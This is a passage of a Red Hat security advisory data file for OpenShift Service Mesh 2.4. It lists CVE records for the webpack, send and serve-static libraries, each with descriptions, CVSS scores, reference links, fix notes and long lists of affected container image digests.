"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", }, { cve: "CVE-2024-43799", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:30.869487+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311153", }, ], notes: [ { category: "description", text: "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.", title: "Vulnerability description", }, { category: "summary", text: "send: Code Execution Vulnerability in Send Library", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43799", }, { category: "external", summary: "RHBZ#2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43799", url: "https://www.cve.org/CVERecord?id=CVE-2024-43799", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", }, { category: "external", summary: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", url: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", }, { category: "external", summary: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", url: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", }, ], release_date: "2024-09-10T15:15:17.727000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:22:37+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7724", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "send: Code Execution Vulnerability in Send Library", }, { cve: "CVE-2024-43800", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:33.631718+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311154", }, ], notes: [ { category: "description", text: "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().", title: "Vulnerability description", }, { category: "summary", text: "serve-static: Improper Sanitization in serve-static", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", 